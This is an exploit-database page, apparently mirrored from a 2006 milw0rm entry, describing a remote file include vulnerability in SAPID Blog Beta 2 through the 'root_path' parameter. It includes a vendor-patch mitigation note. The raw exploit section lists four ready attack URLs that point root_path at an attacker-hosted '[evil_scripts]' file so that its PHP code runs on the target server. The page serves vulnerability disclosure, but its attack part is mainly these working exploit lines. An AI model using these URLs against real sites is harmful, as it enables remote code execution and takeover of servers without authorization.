header-logo
Suggest Exploit
vendor:
SAPID Blog
by:
Kacper (a.k.a Rahim)
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SAPID Blog
Affected Version From: Beta 2
Affected Version To: Beta 2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability

SAPID Blog version Beta 2 is vulnerable to a remote file include vulnerability. This vulnerability is due to the 'root_path' parameter in multiple scripts not being properly sanitized before being used in an include() function call. This can be exploited to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process.

Mitigation:

Upgrade to the latest version of SAPID Blog or apply the vendor patch.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability
$$  Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_meta_info.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR